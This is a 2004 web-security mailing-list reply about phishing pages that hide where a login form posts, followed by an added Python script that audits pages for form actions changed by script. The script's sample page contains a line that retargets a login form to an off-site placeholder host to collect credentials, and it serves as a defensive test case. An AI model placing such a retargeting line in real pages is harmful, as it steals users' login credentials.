WebApp Sec mailing list archives

Re: Growing Bad Practice with Login Forms


From: Steve <network.administrator () gmail com>
Date: Wed, 28 Jul 2004 09:52:51 +0900

On Tue, 27 Jul 2004 21:46:01 +0000 GMT, Jason Coombs PivX Solutions
<jcoombs () pivx com> wrote:
In that example as I mentioned it is (I checked the HTML post location and it was).

You *think* you checked the post location...

Have you not seen attackers who anticipate security-aware types scanning page source before "trusting" the page? It is common now for decoy HTML to be placed at the top of the page, and for client-side scripting, formatting and HTML/script comment tricks to be used to obscure and conceal the fact that the HTML you're looking at is not in fact the HTML that the browser will interpret...

You feel like you're smart enough to read any page source and understand it quickly, but you're not. Nobody is.

Jason Coombs
Jcoombs () PivX com

A sidetrack, but this sounds like an effective silver bullet
solution--I'm not aware of an application or browser plugin that shows
the _effective_ source for any page, or perhaps lets you select areas
of a page and see all the scripting that pertains to it, but there
must be one, if this problem exists.
Of course, this still wouldn't help the average user, but it would
provide an extra level of defense to someone willing to do a bit of
extra work.
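As an added illustration of the gap both posters describe (not code from the thread or from any tool it mentions): a small static audit that lists each form's declared post location alongside any post location assigned by inline script, and flags targets outside the page's origin. The sample page, the hostnames and the form layout are constructed for the example.

```python
"""Compare a form's declared action with actions assigned by inline script.

Heuristic only: it reads the static HTML and inline <script> text, so it
cannot see externally loaded scripts or handlers attached at runtime.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Script patterns that retarget a form:  x.action = "..."  /  setAttribute("action", "...")
ACTION_ASSIGN = re.compile(r"""\.action\s*=\s*['"]([^'"]+)['"]""")
SET_ATTR = re.compile(r"""setAttribute\(\s*['"]action['"]\s*,\s*['"]([^'"]+)['"]\s*\)""")

class FormAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []        # declared action attribute of each <form>
        self.scripts = []      # body text of each inline <script>
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "script" and "src" not in a:
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def audit(html, page_url):
    """Return (declared targets, script-assigned targets, off-origin targets)."""
    parser = FormAudit()
    parser.feed(html)
    origin = urlsplit(page_url).netloc
    declared = [urljoin(page_url, a) for a in parser.forms]
    assigned = [urljoin(page_url, a) for s in parser.scripts
                for a in ACTION_ASSIGN.findall(s) + SET_ATTR.findall(s)]
    off_origin = sorted({u for u in declared + assigned if urlsplit(u).netloc != origin})
    return declared, assigned, off_origin

# Constructed sample: the form a source reader sees posts to the site itself,
# but an inline script changes the post location before the user submits.
SAMPLE = """<html><body>
<form method="post" action="/login"><input name="user"><input name="pass" type="password"></form>
<script>document.forms[0].action = "https://login-mirror.example/collect";</script>
</body></html>"""

if __name__ == "__main__":
    declared, assigned, off_origin = audit(SAMPLE, "https://bank.example/login")
    print("declared:", declared, "assigned:", assigned, "off-origin:", off_origin)
```

Running it against the sample reports the declared target as the site's own /login and the script-assigned target as the off-origin host, which is the discrepancy a reader of the raw source would miss.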
